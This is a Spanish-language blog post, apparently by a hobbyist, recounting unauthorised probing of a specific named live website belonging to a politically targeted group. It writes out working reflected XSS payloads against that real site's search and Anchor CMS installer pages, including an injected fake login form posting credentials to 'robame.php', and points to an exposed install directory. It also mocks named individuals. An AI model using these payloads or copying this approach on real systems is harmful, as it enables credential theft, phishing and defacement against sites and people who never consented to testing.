Es un circo d el diario y la prensa, pero gueno me tome un poco de tiempo ya q me puse a pensar q tan buena seguridad tienen en 'bunker' y si son gente de confianza
En este post voy a mostrar como en 1 horas encontre unos simples errores y me hace pensar 'bunker' a sido target con fines politicos.
Los bugs estan patched en algunos blogs pero no en todos, hay muchos themes con estos problemas.
Nuestro amigo payaso, D Sonsonate por cierto
, ya que d el hay mas info online fue el target
http://payasosingracia.comLo primero que se me vino a la mente fue wordpress site.... como todo es wordpress o joomla, pero NAH, empeze a buscar bugs xD, despues de 10 minutos
http://payasosingracia.com/search/</code><svg/onload=prompt("pwend")> --> firefox
http://payasosingracia.com/search/</code><h1>Hola</h1> --> chrome
de ahi me puse a pensar que tipo de cms estan usando,
/themes/danoxide-snowly/css/styles.css"
mi mejor amigo google me llevo a
https://github.com/danoxide/Snowly que es un theme de anchor cms. me puse a ver el source code y encontre el error en
https://github.com/danoxide/Snowly/blob/master/404.php , no necesito entrar en detalles dond esta. es mas q claro encontrarlo.
sabiendo q usa
https://github.com/anchorcms/anchor-cms me fui a revisar el codigo fuente de anchor cms, y empeze a hacer un simple test para buscar directorios, la sorpresa q me lleve
http://payasosingracia.com/install/ ese directorio me imagino q tiene q ser eliminado after installation......
me puse a click click click a ver q encontraba. y me llevo a http://payasosingracia.com/install/index.php?route=/database .... me tiro un db error, pero hay q seguir probando..... ahora que pasa si cambio
http://payasosingracia.com/install/index.php?route=404me lleva a una error page .... y que si hago
http://payasosingracia.com/install/index.php?route=</code><script>alert(13123213);</script>http://payasosingracia.com/install/index.php?route=</code><iframe scr="http://google.com" ></iframe>Interesante..... anchor tiene un error en su instalador. Ahora que pasa si yo kiero enviarle un phishing site y cambiar el sitio por completo y robar su login o no se q coma mas.....
http://payasosingracia.com/install/index.php?route=</code><style>h1{display:none;} p{display:none;} .hello{display:none;}</style><h1>Login Form</h1><form action="robame.php" method="post" > Username <input type="text" /><br />Password <input type="password" /><br /><input type="submit" value="Login To view Page" /></form><div class="hello"Al final este es con fines educativos LOL........ este ultimo bug con el installer es un POC de mi parte, no esta en ningun foro ni en ningun lugar en la web. El bug fue reportando y parcheado hace un par d dias atras.
anchors cms < 0.12
Ahora me pongo a pensar , porq hacen el gran show los de la prensa y el diablo de hoy con esta gente de bunker???
